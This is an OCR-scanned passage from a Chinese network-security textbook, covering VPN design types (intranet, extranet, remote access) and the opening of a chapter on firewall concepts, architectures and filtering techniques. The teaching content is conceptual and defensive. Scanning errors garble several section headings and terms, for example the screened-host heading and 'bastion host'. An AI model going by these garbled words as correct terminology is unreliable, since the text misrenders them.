VPN 有 3 种 解决 方案 ,用 户 可 以 根据 自己 的 情况 进行 选择 。 这 3 种 解决 方案 分 别 是 远 
程 访问 虚拟 网 (Access VPN) ,企业 内 部 虚拟 网 (Intranet VPN) 和 企业 扩展 虚拟 网 (Extranet 
VPN) ,这 3 种 类 型 的 VPN 分 别 与 传统 的 远程 访问 网 络 \ 企 业内 部 的 Intranet 以 及 企业 网 
和 相关 合作 伙伴 的 企业 网 所 构成 的 Extranet 相对 应 。 一 个 完整 的 VPN 工作 原理 图 如 
图 13.20 所 示 。 


13.7.1 内 联网 VPN 设计 方案 


采用 租用 专线 的 方式 使 公司 两 异地 机 构 的 局 域 网 互联 ,是 在 VPN 技术 出 现 以 前 的 主 
要 方式 ,虽然 该 方式 也 采用 隧道 等 技术 ,在 一 端 将 数据 封装 后 通过 专线 传输 到 目的 方 解 封 
装 , 然 后 发 往 最 终 目 的 地 ,并 且 该 方式 也 能 提供 传输 的 透明 性 ,但 是 它 与 VPN 技术 在 安全 
性 上 有 根本 的 差异 。 而 且 在 分 公司 增多 .业务 开展 越 来 越 广泛 时 ,网 络 结构 趋 于 复杂 ,费用 
昂贵 。 

利用 VPN 特性 可 以 在 Internet 上 组 建 世 界 范围 内 的 Intranet VPN。 利 用 Internet 的 
线路 保证 网 络 的 互联 性 ,而 利用 隧道 ,加密 等 VPN 特性 可 以 保证 信息 在 整个 Intranet VPN 
上 安全 传输 。 如 图 13. 21 所 示 的 是 Intranet VPN 通过 一 个 使 用 专用 连接 的 共享 基础 设施 
来 连接 企业 总 部 、 远 程 办 事 处 和 分 支 机 构 的 方案 。 企 业 拥 有 与 专用 网 络 的 相同 政策 ,包括 安 
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图 13. 20 完整 的 VPN 工作 原理 图 


全 、 服 务 质量 (QoS) ,可 管理 性 和 可 靠 性 。 
Intranet VPN 主要 有 以 下 几 个 优点 : 
。 减 少 WAN 带宽 的 费用 。 
。 能 使 用 灵活 的 拓扑 结构 ,包括 全 网 络 连接 。 
。 新 的 站 点 能 更 快 、 更 容易 地 被 连接 。 
。 通过 设备 供应 商 WAN 的 连接 元 余 , 可 以 延长 网 络 的 可 用 时 间 。 
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图 13. 21 Intranet VPN 


13.7.2 外 联网 VPN 构建 方案 


随 着 信息 时 代 的 到 来 ,各 个 企业 越 来 越 重 视 各 种 信息 的 处 理 。 企 业 希 望 可 以 提供 给 客 
户 最 快捷 方便 的 信息 服务 ,通过 各 种 方式 了 解 客户 的 需要 ,同时 各 个 企业 之 间 的 合作 关系 也 
越 来 越 多 ,信息 交换 日 益 频 繁 。Internet 为 这 样 的 一 种 发 展 趋势 提供 了 良好 的 基础 ,而 如 何 
利用 Internet 进行 有 效 的 信息 管理 ,是 企业 发 展 不 可 避免 的 一 个 关键 问题 。 利 用 VPN 技术 
可 以 组 建安 全 的 Extranet, 既 可 以 向 客户 、 合 作 伙伴 提供 有 效 的 信息 服务 ,又 可 以 保证 自身 
的 内 部 网 络 的 安全 。 

如 图 13. 22 所 示 的 是 Extranet VPN 通过 一 个 使 用 专用 连接 的 共享 基础 设施 ,将 客户 、 
供应 商 、 合 作 伙 伴 或 兴趣 群体 连接 到 企业 内 部 网 的 方案 。 此 种 类 型 由 于 是 不 同 公司 的 网 络 
相互 通信 ,所 以 要 更 多 地 考虑 设备 的 互联 、 地 址 的 协调 和 安全 策略 的 协商 等 问题 。 利 用 
VPN 技术 可 以 组 建安 全 的 Extranet, 既 可 以 向 客户 ,合作 伙伴 提供 有 效 的 信息 服务 ,又 可 以 
保证 自身 的 内 部 网 络 的 安全 。Extranet VPN 通过 一 个 使 用 专用 连接 的 共享 基础 设施 ,将 客 
户 、 供 应 商 、 合 作 伙 伴 或 兴趣 群体 连接 到 企业 内 部 网 。 企 业 拥有 与 专用 网 络 相同 政策 ,包括 
安全 ,服务 质量 (QoS) .可 管理 性 和 可 靠 性 。 


合作 伙伴 
分 公司 


总 公司 


1 Ve 
> 


客户 供应 商 


图 13. 22 Extranet VPN 


Extranet VPN 结构 的 主要 好 处 ,是 能 容易 地 对 外 部 网 进行 部 署 和 管理 ,外 部 网 的 连接 
可 以 使 用 与 内 部 网 和 远 端 访问 VPN 相同 的 架构 和 协议 进行 部 署 。 主 要 的 不 同 是 接 人 许 
可 ,外 部 网 的 用 户 被 许可 只 有 一 次 机 会 连接 到 其 他 合作 人 的 网 络 。Extranet VPN 适合 于 
B2B 的 安全 访问 模式 。 


13.7.3 远程 接 入 VPN 构建 方案 


Access VPN 通过 一 个 拥有 与 专用 网 络 相 同 策略 的 共享 基础 设施 ,提供 对 企业 内 部 网 
或 外 部 网 的 远程 访问 。Access VPN 能 使 用 户 随时 随地 以 其 所 需 的 方式 访问 企业 资源 。 
Access VPN 包括 模拟 、 拨 号 ISDN 、 数 字 用 户 线路 (xDSL) ,移动 IP 和 电缆 技术 ,能够 安全 
地 连接 移动 用 户 、 远 程 工作 者 或 分 支 机 构 。 与 传统 的 远程 访问 网 络 相对 应 ,在 该 方式 下 远 端 
用 户 不 再 是 如 传统 的 远程 网 络 访问 那样 ,通过 长 途 电话 拨号 到 公司 远程 接 人 端口 ,而 是 拨号 | 第 
接 人 到 用 户 本 地 的 ISP, 利 用 VPN 系统 在 公众 网 上 建立 一 个 从 客户 端 到 网 关 的 安全 传输 通 13 


访问 控制 与 VPN 其 术 


秦 于 案例 的 网 络 安全 技术 与 实践 


道 。 连 接 的 方案 如 图 13. 23 所 示 。 
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13.23 Access VPN 


Access VPN 最 适用 于 公司 内 部 经 常 有 流动 人 员 远 程 办 公 的 情况 。 出 差 员工 利用 当地 
ISP 提供 的 VPN 服务 ,就 可 以 和 公司 的 VPN 网 关 建立 私有 的 隧道 连接 。RADIUS 服务 器 
可 对 员工 进行 验证 和 授权 ,保证 连接 的 安全 ,同时 负担 的 电话 费用 大 大 降低 。 

Access VPN 对 用 户 的 吸引 力 有 以 下 几 种 。 

。 减少 用 于 相关 的 调制 解 调 器 和 终端 服务 设备 的 资金 及 费用 ,简化 网 络 。 

。 实现 本 地 拨号 接 人 的 功能 来 取代 远 距 离 接 人 或 800 电话 接 入 ,这 样 能 显著 降低 远 距 

离 通信 的 费用 。 

。 极 大 的 可 扩展 性 ,简便 地 加 入 网 络 的 新 用 户 进行 调度 。 

。 远 端 验证 拨 入 用 户 服务 (RADIUS) 基 于 标准 ,基于 策略 功能 的 安全 服务 。 

。 将 工作 重心 从 管理 和 保留 运作 拨号 网 络 的 工作 人 员 转 到 公司 的 核心 业务 上 来 。 


13.8 小 结 


本 章 首先 讲解 了 访问 控制 技术 ,介绍 了 访问 控制 技术 的 概念 与 一 般 方 法 ,重点 介绍 了 自 
主 访问 控制 技术 ,强制 访问 控制 技术 和 基于 角色 的 访问 控制 技术 。 接 着 在 后 面 的 几 个 小 节 中 
介绍 了 VPN 的 工作 原理 ,VPN 的 体系 结构 和 分 类 以 及 VPN 的 关键 技术 和 VPN 设计 实例 。 


13.9 习 题 


. 自主 访问 控制 模式 主要 有 哪 几 种 ? 各 种 访问 模式 主要 有 什么 区 别 ? 
. 强行 访问 控制 主要 有 哪 几 种 模型 ? 每 种 模型 有 什么 特点 ? 
. 什么 是 基于 角色 的 访问 控制 ? 在 这 种 访问 控制 中 是 如 何 实现 角色 管理 的 ? 
. 简 述 VPN 的 种 类 以 及 各 类 的 优 缺 点 和 适用 场合 。 
. VPN 有 哪些 构建 方案 ? 试 在 网 络 上 查找 相应 的 实际 工程 解决 方案 ,了 解 实 际 工程 
中 的 需求 分 析 过 程 。 
6. 查找 常用 架设 VPN 所 使 用 的 设备 资料 ,熟悉 其 功能 、 价 格 及 特点 。 


Dr 


第 14 章 防火 墙 与 隔离 网 闸 


墙 漏洞 做 高 墙 \ 防 外 攻 , 防 不 胜 防 。 


随 着 计算 机 网 络 的 发 展 ,网 络 的 开放 性 、 共 享 性 、 互 连 程 度 也 随 之 扩大 。 政 府 上 网 工程 
的 启动 和 实施 ,电子 商务 (Electronic commerce) ,电子 货币 (Electronic currency) 、 网 上 银行 
等 网 络 业务 的 兴起 和 发 展 ,使 得 网 络 安全 问题 显得 日 益 重 要 和 突出 。 防 火 墙 与 隔离 网 闸 技 
术 能 够 提高 数据 在 网 络 传输 过 程 的 安全 性 , 现 已 被 广泛 应 用 于 计算 机 网 络 安全 领域 。 


14.1 防火 墙 概述 


防火 墙 是 一 种 访问 控制 技术 ,在 某 个 机 构 的 网 络 和 不 安全 的 网 络 之 间 设 置 障碍 , 阻止 
对 信息 资源 的 非法 访问 , 也 可 以 使 用 防火 墙 阻止 保密 信息 从 受 保护 网 络 上 被 非法 输出 。 换 
言 之 ,防火 墙 是 一 道门 槛 , 控制 进出 两 个 方向 的 通信 。 通 过 限制 与 网 络 或 某 一 特定 区 域 的 
通信 , 以 达到 防止 非法 用 户 侵 犯 受 保护 网 络 的 目的 。 

防火 墙 不 是 一 个 单独 的 计算 机 程序 或 设备 。 在 理论 上 ,防火 墙 是 由 软件 和 硬件 两 部 分 
组 成 ,用 来 阻止 所 有 网 络 间 不 受 欢 迎 的 信息 交换 ,而 允许 那些 可 接受 的 通信 。 


14.1.1 防火 墙 的 概念 


防火 墙 是 指 设置 在 不 同 网 络 ( 如 可 信任 的 企业 内 部 网 和 不 可 信 的 公共 网 ) 或 网 络 安全 域 
之 间 的 一 系列 部 件 的 组 合 。 它 是 不 同 网 络 或 网 络 安全 域 之 间 信 息 的 唯一 出 入 口 ,能 根据 用 
户 的 安全 策略 控制 (允许 ,拒绝 、 监 测 ) 出 入 网 络 的 信息 流 , 且 本 身 具 有 和 较 强 的 抗 攻 击 能 力 。 
它 是 提供 信息 安全 服务 ,实现 网 络 和 信息 安全 的 基础 设施 。 

在 多 辑 上 ,防火墙 是 一 个 分 离 器 ,一 个 限制 器 ,也 是 一 个 分 析 器 ,能 有 效 地 监控 内 部 网 和 
Internet 之 间 的 任何 活动 ,保证 内 部 网 络 的 安全 。 


14.1.2 防火 墙 的 特性 


典型 的 防火 墙 具 有 以 下 3 个 方面 的 基本 特性 。 

1. 内 部 网 络 和 外 部 网 络 之 间 的 所 有 网 络 数 据 流 都 必须 经 过 防火 墙 

这 是 防火 墙 所 处 网 络 位 置 的 特性 ,同时 也 是 一 个 前 提 。 只 有 当 防 火 墙 是 内 、 外 部 网 络 之 
间 通 信和 的 唯一 通道 时 , 才 可 以 全 面 ` 有 效 地 保护 用 户 内 部 网 络 不 受 侵害 。 

根据 美国 国家 安全 局 制定 的 《信息 保障 技术 框架 》, 防 火 墙 适用 于 用 户 网 络 系统 的 边界 ， 


基于 案例 的 网 络 安 会 技术 与 实践 


属于 用 户 网 络 边 界 的 安全 保护 设备 。 网 络 边 界 即 是 采用 不 同安 全 策略 的 两 个 网 络 连 接 处 ， 
如 用 户 网 络 和 Internet 之 间 连 接 、 和 其 他 业务 往来 单位 的 网 络 连接 、 用 户 内 部 网 络 不 同 部 门 
之 间 的 连接 等 。 

防火 墙 的 目的 就 是 在 网 络 连接 之 间 建 立 一 个 安全 控制 点 ,通过 人 允许、 拒绝 或 重新 定向 经 
过 防火 墙 的 数据 流 ,实现 对 进 ` 出 内 部 网 络 的 服务 和 访问 的 审计 和 控制 。 典 型 的 防火 墙 体系 


网 络 结构 如 图 14. 1 所 示 。 


内 部 网 络 


FP 


14.1 防火 墙 在 OSI 上 的 位 置 


从 图 14. 1 中 可 以 看 出 ,防火 墙 的 一 端 连 接 企 事 业 单位 内 部 的 局 域 网 ,而 另 一 端 则 连接 
着 Internet, 所 有 的 内 、 外 部 网 络 之 间 的 通信 都 要 经 过 防火 墙 。 

2. 只 有 符合 安全 策略 的 数据 流 才能 通过 防火 墙 

防火 墙 最 基本 的 功能 是 确保 网 络 流量 的 合法 性 ,并 在 此 前 提 下 将 网 络 的 流量 快速 的 从 
一 条 链 路 转发 到 另外 的 链 路 上 去 。 原 始 的 防火 墙 是 一 台 “ 双 穴 主 机 ”, 即 具备 两 个 网 络 接口 ， 
同时 拥有 两 个 网 络 层 地 址 。 防 火 墙 将 网 络 上 的 流量 通过 相应 的 网 络 接口 接收 ,按照 OSI 协 
议 栈 的 七 层 结构 顺序 上 传 ,在 适当 的 协议 层 进行 访问 规则 和 安全 审查 ,然后 将 符合 通过 条 件 
的 报 文 从 相应 的 网 络 接口 送出 ,而 对 于 那些 不 符合 通过 条 件 的 报 文 则 予以 阻 断 。 因 此 ,从 这 
个 角度 上 来 说 ,防火 墙 是 一 个 类 似 于 桥接 或 路 由 器 的 多 端口 的 (网 络 接口 三 2) 转 发 设备 , 它 
跨 接 于 多 个 分 离 的 物理 网 段 之 间 , 并 在 报 文 转发 过 程 之 中 完成 对 报 文 的 审查 工作 。 

3. 防火 墙 自 身 应 具有 非常 强 的 抗 攻 击 免疫 力 

这 是 防火 墙 能 担当 用 户 内 部 网 络 安全 防护 重任 的 先决 条 件 。 防 火 墙 处 于 网 络 边 缘 , 它 
就 像 一 个 边界 卫士 ,每 时 每 刻 都 要 面 对 黑客 的 入 侵 ,这样 就 要 求 防火 墙 自身 要 具有 非常 强 的 
抗击 人 侵 能 力 。 这 其 中 防火 墙 操作 系统 本 身 是 关键 ,只 有 自身 具有 完整 信任 关系 的 操作 系 
统 才 可 以 保证 系统 的 安全 性 。 其 次 就 是 防火 墙 自身 具有 非常 低 的 服务 功能 ,除了 专门 的 防 
火 墙 嵌入 系统 外 ,再 没有 其 他 应 用 程序 在 防火 墙 上 运行 。 当 然 这 些 安全 性 也 只 能 说 是 相 
对 的 。 


14.1.3 防火 墙 的 功能 


一 般 来 说 ,防火 墙 具有 以 下 几 种 功能 。 

(1) 允许 网 络 管理 员 定义 一 个 中 心 点 来 防止 非法 用 户 进入 内 部 网 络 。 

(2) 可 以 很 方便 地 监视 网 络 的 安全 性 ,并 报警 。 

(3) 可 以 作为 部 署 网 络 地 址 变换 (Network Address Translation, NAT) 的 地 点 ,利用 


NAT 技术 ,将 有 限 的 IP 地 址 动态 或 静态 地 与 内 部 的 IP 地 址 对 应 起 来 ,用 来 缓解 地 址 空间 
短缺 的 问题 。 

(4) 审计 和 记录 Internet 使 用 费用 。 网 络 管理 员 可 以 在 此 向 管理 部 门 提供 Internet 连 
接 的 费用 情况 , 查 出 潜在 的 带宽 瓶颈 位 置 , 并 能 够 依据 本 机 构 的 核算 模式 提供 部 门 级 的 
计 费 。 

(5) 可 以 连接 到 一 个 单独 的 网 段 上 ,从 物理 上 和 内 部 网 段 隔离 ,并 在 此 部 署 如 WWW 
服务 器 和 FTP 服务 器 等 ,将 其 作为 向 外 部 发 布 内 部 信息 的 地 点 。 从 技术 角度 来 讲 , 就 是 非 
军事 区 (DMZ2)。 


14.2 防火 墙 体系 结构 


保 傈 主机 在 防火 墙 体系 结构 中 起 着 至 关 重 要 的 作用 , 它 专门 用 来 击 退 攻击 行为 。 网 络 
防御 的 第 一 步 是 寻找 堡垒 主机 的 最 佳 位 置 ,堡垒 主机 为 内 网 和 外 网 之 间 的 所 有 通道 提供 一 
个 阻塞 点 。 没 有 堡垒 主机 就 不 能 连接 外 网 ,同样 外 网 也 不 能 访问 内 网 。 如 果 通 过 堡垒 主机 
来 集中 网 络 权限 ,就 可 以 更 轻松 地 配置 软件 来 保护 你 的 网 络 。 


14.2.1 双重 宿主 主机 体系 结构 


多 宿主 主机 这 个 词 是 用 来 描述 配 有 多 个 网 卡 的 主机 ,每 个 网 卡 都 和 网 络 相 连接 。 代 理 
服务 器 可 以 算是 多 宿主 主机 防火 墙 的 一 种 。 在 历史 上 ,多 宿主 主机 可 以 在 网 段 之 间 传 送 流 
量 , 今 天 一 般 都 使 用 专门 的 路 由 器 来 完成 IP 路 由 转发 ,如 图 14. 2 所 示 。 

如 果 多 宿主 主机 的 路 由 功能 被 禁止 , 则 主机 可 以 在 它 连 接 的 网 络 之 间 提 供 网 络 流量 的 
分 离 ,并 且 每 个 网 络 都 能 在 宿主 主机 上 处 理应 用 程序 。 另 外 ,如 果 应 用 程序 允许 ,网 络 还 可 
以 共享 数据 。 

双 宿 主 主 机 是 多 宿主 主机 的 一 个 特例 , 它 有 两 个 网 卡 ,并 禁止 路 由 功能 。 

双 宿 主 主机 可 以 用 于 把 一 个 内 部 网 络 从 一 个 不 可 信 的 外 部 网 络 分 离 出 来 。 因 为 双 宿主 
主机 不 能 转发 任何 TCP/IP 流量 ,所 以 它 可 以 彻底 堵塞 内 部 和 外 部 不 可 信和 网 络 间 的 任何 IP 
流量 。 然 后 防火 墙 运行 代理 软件 控制 数据 包 从 一 个 网 络 流向 另 一 个 网 络 , 这 样 内 部 网 络 中 
的 计算 机 就 可 以 访问 外 部 网 络 ,如 图 14. 3 所 示 。 


图 14.2 多 宿主 主机 结构 图 14.3 双 宿 主 主机 内 外 部 网 络 访问 结构 


双 宿主 主机 是 防火 墙 体系 的 基本 形态 。 建 立 双 宿主 主机 的 关键 是 要 禁止 路 由 ,网 络 之 
间 通 信和 的 唯一 路 径 是 通过 应 用 层 的 代理 软件 。 如 果 路 由 被 意外 允许 ,那么 双 宿 主 主机 防火 
墙 的 应 用 检测 功能 就 会 被 旁 路 ,内 部 受 保护 网 络 就 会 完全 暴露 在 危险 中 。 


态 火 于 与 硫 敲 网 阅 


蕉 于 案例 的 网 络 安 会 技术 与 实践 


14.2.2 和 异 坑 主机 体系 结构 


主机 屏蔽 防火 墙 比 双 宿主 机 防火 墙 更 安全 。 主 机 屏蔽 防火 墙 体系 结构 是 在 防火 墙 的 前 
面 增加 了 屏蔽 路 由 器 。 换 句 话说 就 是 防火 墙 不 直接 连接 外 网 ,这 样 的 形式 提供 一 种 非常 有 
效 的 并 且 容 易 维 护 的 防火 墙 体系 。 

因为 路 由 器 具有 数据 过 滤 功 能 ,路 由 器 通过 适当 配置 后 ,可 以 实现 一 部 分 防火 墙 的 功 
能 ,因此 ,有 人 把 屏蔽 路 由 器 也 看 成 防火 墙 的 一 种 ,如 图 14.4 所 示 。 

实际 上 ,常常 把 屏蔽 路 由 器 作为 保护 网 络 的 第 一 道 防线 。 根 据 内 网 的 安全 策略 ,屏蔽 路 
由 器 可 以 过 滤 掉 不 允许 通过 的 数据 包 。 

屏蔽 路 由 器 配置 要 根据 实际 的 网 络 安全 策略 来 进行 ,如 服务 器 提供 Web 服务 就 需要 屏 
蔽 路 由 器 开放 80 端口 。 

因为 这 种 体系 结构 允许 数据 包 从 外 网 向 内 网 移动 ,所 以 它 的 设计 比 没有 外 部 数据 流量 
的 双 宿 主机 更 冒 风险 ,但 实际 上 双 宿 主机 体系 结构 在 防备 数据 包 流 入 内 网 时 也 会 造成 失败 。 
总 之 保护 路 由 器 比 保 护 主机 更 容易 实现 ,因为 路 由 器 提供 非常 有 限 的 服务 ,漏洞 要 比 主 机 少 
得 多 ,所 以 主机 屏蔽 防火 墙 体系 结构 能 提供 更 好 的 安全 性 和 可 用 性 。 


14.2.3 和 异 蔽 子 网 体系 结构 


子 网 屏蔽 防火 墙 体系 结构 添加 额外 的 安全 层 到 主机 屏蔽 体系 结构 , 即 通过 添加 周边 网 
络 更 进一步 地 把 内 部 网 络 与 外 网 隔离 ,如 图 14. 5 所 示 。 

通常 ,堡垒 主机 是 网 络 上 最 容易 受 攻击 的 机 器 。 任 赁 用 户 如 何 保护 它 , 它 仍 有 可 能 被 突 
破 或 人 侵 ,因为 没有 任何 主机 是 绝对 安全 的 。 


图 14.4 主机 屏蔽 防火 墙 图 14.5 子 网 屏蔽 防火 墙 


在 主机 屏蔽 体系 中 ,用 户 的 内 部 网 络 对 堡垒 主机 没有 任何 防御 措施 ,如 果 黑 客 成 功 入 侵 
到 主机 屏蔽 体系 结构 中 的 堡 从 主机, 那 就 毫 无 阻挡 地 进入 了 内 部 网 络 。 通 过 在 周边 网 络 上 
隔离 堡垒 主机 ,能 减少 在 堡垒 主机 上 入 侵 的 影响 。 可 以 说 它 只 给 入 侵 者 一 些 访问 的 机 会 ,但 
不 是 全 部 。 

屏蔽 子 网 体系 结构 的 最 简单 的 形式 为 使 用 两 个 屏蔽 路 由 器 ,位 于 堡 公主 机 的 两 端 : 一 


端 连接 内 网 ,一 端 连接 外 网 。 为 了 入 侵 这 种 类 型 的 体系 结构 ,入 侵 者 必须 穿 透 两 个 屏蔽 路 由 
器 。 即 使 人 侵 者 控制 了 堡垒 主机 ,他 仍然 需要 通过 内 网 端的 屏蔽 路 由 器 才能 到 达 内 网 。 


14.2.4 防火 墙 体系 结构 的 组 合 形 式 


在 构造 防火 墙 体系 时 ,一 般 很 少 使 用 单一 的 技术 ,通常 都 是 多 种 解决 方案 的 组 合 。 这 种 
组 合 主要 取决 于 网 管 中 心 向 用 户 提供 什么 服务 ,以 及 网 管 中 心 能 接受 什么 等 级 的 风险 。 还 
要 看 投资 经 费 \ 技 术 人 员 的 水 平和 时 间 等 问题 。 一 般 包 括 下 面 几 种 形式 : 使 用 多 个 堡垒 主 
机 ; 合并 内 部 路 由 器 和 外 部 路 由 器 ; 合并 堡垒 主机 和 外 部 路 由 器 ; 合并 堡垒 主机 和 内 部 路 
由 器 ; 使 用 多 个 内 部 路 由 器 ; 使 用 多 个 外 部 路 由 器 ; 使 用 多 个 周边 网 络 ; 使 用 双 宿 主 主机 
与 屏 项 子 网 。 


14.3 ”防火墙 技 术 


14.3.1 防火 墙 所 采用 的 主要 技术 


防火 墙 所 使 用 的 主要 技术 有 数据 包 过 滤 、 应 用 网 关 和 代理 服务 等 。 

1. 包 过 滤 技 术 

包 过 滤 (Packet Filter) 技 术 是 在 网 络 层 中 对 数据 包 实 施 有 选择 的 通过 。 依 据 系统 内 事 
先 设 定 的 过 滤 逻 辑 , 检查 数据 流 中 每 个 数据 包 后 , 根据 数据 包 的 源 地 址 .目的 地 址 .TCP/ 
UDP 源 端口 号 、TCP/UDP 目的 端口 号 及 数据 包头 中 的 各 种 标志 位 等 因素 来 确定 是 否 人 允许 
数据 包 通过 ,其 核心 是 安全 策略 即 过 滤 算法 的 设计 。 

例如 ,用 于 特定 的 Internet 服务 的 服务 器 驻 留 在 特定 的 端口 号 的 事实 (如 TCP 端口 23 
用 于 Telnet 连接 ) ,使 包 过 滤器 可 以 通过 简单 的 规定 适当 的 端口 号 来 达到 阻止 或 允许 一 定 
类 型 的 连接 的 目的 ,并 可 进一步 组 成 一 套数 据 包 过 滤 规 则 。 

包 过 滤 技 术 作为 防火 墙 的 应 用 有 3 类 : 一 是 路 由 设备 在 完成 路 由 选择 和 数据 转发 之 
外 , 同时 进行 包 过 滤 , 这 是 目前 较 常用 的 方式 ; 二 是 在 工作 站 上 使 用 软件 进行 包 过 滤 ， 这 
种 方式 价格 较 贵 ; 三 是 在 一 种 称 为 屏蔽 路 由 器 的 路 由 设备 上 启动 包 过 滤 功 能 。 

2. 应 用 网 关 技 术 

应 用 网 关 (Application Gateway) 技 术 是 建立 在 网 络 应 用 层 上 的 协议 过 滤 , 它 针 对 特别 
的 网 络 应 用 服务 协议 即 数据 过 滤 协 议 ,并 且 能 够 对 数据 包 分 析 并 形成 相关 的 报告 。 应 用 网 
关 对 某 些 易于 登录 和 控制 所 有 输出 输入 的 通信 的 环境 给 予 严 格 的 控制 , 以 防 有 价值 的 程序 
和 数据 被 窃取 。 它 的 另 一 个 功能 是 对 通过 的 信息 进行 记录 ,如 什么 样 的 用 户 在 什么 时 间 连 
接 了 什么 站 点 。 在 实际 工作 中 , 应 用 网 关 一 般 由 专用 工作 站 系统 来 完成 。 

有 些 应 用 网 关 还 存储 Internet 上 的 那些 被 频繁 使 用 的 页 面 。 当 用 户 请 求 的 页 面 在 应 用 
网 关 服 务 器 缓存 中 存在 时 ,服务 器 将 检查 所 缓存 的 页 面 是 否 是 最 新 的 版 本 ( 即 该 页 面 是 否 已 
更 新 ) ,如 果 是 最 新 版 本 , 则 直接 提交 给 用 户 ,和 否则 ,到 真正 的 服务 器 上 请 求 最 新 的 页 面 ,然后 
再 转发 给 用 户 。 

3. 代理 服务 器 技术 

代理 服务 器 (Proxy Server) 作 用 在 应 用 层 , 它 用 来 提供 应 用 层 服务 的 控制 ,起 到 内 部 网 
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络 向 外 部 网 络 申请 服务 时 中 间 转 接 作用 。 内 部 网 络 只 接受 代理 提出 的 服务 请 求 ,拒绝 外 部 
网 络 其 他 节点 的 直接 请 求 。 

具体 地 说 ,代理 服务 器 是 运行 在 防火 墙 主机 上 的 专门 的 应 用 程序 或 者 服务 器 程序 ; 防 
火 墙 主 机 可 以 是 具有 一 个 内 部 网 络 接口 和 一 个 外 部 网 络 接口 的 双重 宿主 主机 ,也 可 以 是 一 
些 可 以 访问 Internet 并 被 内 部 主机 访问 的 堡垒 主机 。 这 些 程序 接受 用 户 对 Internet 服务 的 
请 求 ( 诸 如 FTP .Telnet) ,并 按照 一 定 的 安全 策略 将 它们 转发 到 实际 的 服务 器 。 代 理 提供 代 
替 连 接 并 且 充 当 服 务 的 网 关 。 

包 过 滤 技 术 和 应 用 网 关 是 通过 特定 的 逻辑 判断 来 决定 是 否 人 允许 特定 的 数据 通过 ,其 优 
点 是 速度 快 .实现 方便 ; 缺点 是 审计 功能 差 , 过 滤 规 则 的 设计 存在 矛盾 关系 ,过 滤 规 则 简单 ， 
安全 性 差 , 过 滤 规 则 复杂 ,管理 困难 。 一 旦 判断 条 件 满足 , 防火 墙 内 部 网 络 的 结构 和 运行 状 
态 便 “暴露 ”在 外 来 用 户 面 前 。 代 理 技术 则 能 进行 安全 控制 又 可 以 加 速 访问 ,能 够 有 效 地 实 
现 防 火 墙 内 外 计算 机 系统 的 隔离 ,安全 性 好 ,还 可 用 于 实施 较 强 的 数据 流 监 控 、 过 滤 、 记 录 和 
报告 等 功能 。 其 缺点 是 对 于 每 一 种 应 用 服务 都 必须 为 其 设计 一 个 代理 软件 模块 来 进行 安全 
控制 ,而 每 一 种 网 络 应 用 服务 的 安全 问题 各 不 相同 ,分 析 困 难 , 因 此 实现 也 困难 。 

在 实际 应 用 当中 ,构筑 防火 墙 的 “真正 的 解决 方案 "很 少 采 用 单一 的 技术 ,通常 是 多 种 解 
决 不 同 问题 的 技术 的 有 机 组 合 。 你 需要 解决 的 问题 依赖 于 你 想 要 向 你 的 客户 提供 什么 样 的 
服务 以 及 你 愿意 接受 什么 等 级 的 风险 ,采用 何 种 技术 来 解决 哪些 问题 依赖 于 你 的 时 间 、 金 
钱 ,专长 等 因素 。 

一 些 协 议 ( 如 Telnet\SMTP) 能 更 有 效 地 处 理 数据 包 过 滤 ,而 另 一 些 ( 如 FTP、Gopher、 
WWW) 能 更 有 效 地 处 理 代 理 。 大 多 数 防火 墙 将 数据 包 过 滤 和 代理 服务 器 结合 起 来 使 用 。 


14.3.2 防火 墙 的 分 类 


1. 从 防火 墙 的 软 .硬件 形式 分 类 

防火 墙 可 分 为 软件 防火 墙 硬 件 防火 墙 以 及 芯片 级 防火 墙 。 

1) 软件 防火 墙 

软件 防火 墙 运行 于 特定 的 计算 机 上 , 它 需要 客户 预先 安装 的 计算 机 操作 系统 的 支持 , 俗 
称 * 个 人 防火 墙 ?。 软 件 防火 墙 就 像 其 他 的 软件 产品 一 样 需要 先 在 计算 机 上 安装 并 做 好 配置 
才 可 以 使 用 。 

2) 硬件 防火 墙 

这 里 说 的 硬件 防火 墙 是 指 “ 所 谓 的 硬件 防火 墙 "。 之 所 以 加 上 “所 谓 ” 二 字 是 针对 芯片 级 
防火 墙 所 说 ,它们 最 大 的 差别 在 于 是 否 基于 专用 的 硬件 平台 。 目 前 市 场 上 大 多 数 防火 墙 都 
是 这 种 “所 谓 的 硬件 防火 墙 ”, 它 们 都 基于 PC 架构 ,就 是 说 ,它们 和 普通 的 家 庭 用 的 PC 没有 
太 大 区 别 。 在 这 些 PC 架构 防火 墙 上 运行 一 些 经 过 裁剪 和 简化 的 操作 系统 ,最 常用 的 有 老 
版 本 的 UNIX、Linux 和 FreeBSD 系统 。 值 得 注意 的 是 ,此 类 防火 墙 依然 会 受到 OS( 操 作 系 
统 ) 本 身 的 安全 性 影响 。 

传统 硬件 防火 墙 一 般 至 少 应 具备 3 个 端口 ,分 别 接 内 网 、 外 网 和 DMZ 区 ( 非 军事 化 
区 ) ,现在 一 些 新 的 硬件 防火 墙 往往 扩展 了 端口 ,常见 四 端口 防火 墙 一般 将 第 四 个 端口 作为 
配置 端口 或 管理 端口 。 很 多 防火 墙 还 可 以 进一步 扩展 端口 数目 。 


3) 芯片 级 防火 墙 

芯片 级 防火 墙 基于 专门 的 硬件 平台 。 专 有 的 ASIC 芯片 促使 它们 比 其 他 种 类 的 防火 墙 
速度 更 快 ,处 理 能 力 更 强 ,性 能 更 高 。 这 类 防火 墙 最 著名 的 厂商 有 NetScreen、 FortiNet、 
Cisco 等 。 这 类 防火 墙 由 于 使 用 专用 OS( 操 作 系 统 ), 因 此 防火 墙 本 身 的 漏洞 比较 少 , 不 过 
价格 相对 比较 高 昂 。 

2. 从 防火 墙 的 技术 实现 分 类 

防火 墙 可 分 为 包 过 滤 型 防火 墙 \ 应 用 代理 型 防火 墙 及 入 侵 状 态 检 测 防火 墙 3 大 类 。 

1) 包 过 滤 (Packet Filtering) 型 防火 墙 

包 过 滤 型 防火 墙 工作 在 OSI 参考 模型 的 网 络 层 和 传输 层 , 它 根据 数据 包头 源 地 址 、 目 
的 地 址 、 端 口号 和 协议 类 型 等 标志 确定 是 否 允 许 通过 。 只 有 满足 过 滤 条 件 的 数据 包 才 被 转 
发 到 相应 的 目的 地 ,其 余数 据 包 则 被 从 数据 流 中 丢弃 。 

包 过 滤 方 式 是 一 种 通用 、 廉 价 和 有 效 的 安全 手段 。 之 所 以 通用 ,是 因为 它 不 是 针对 各 个 
具体 的 网 络 服务 采取 特殊 的 处 理 方式 ,适用 于 所 有 网 络 服务 ; 之 所 以 廉价 ,是 因为 大 多 数 路 
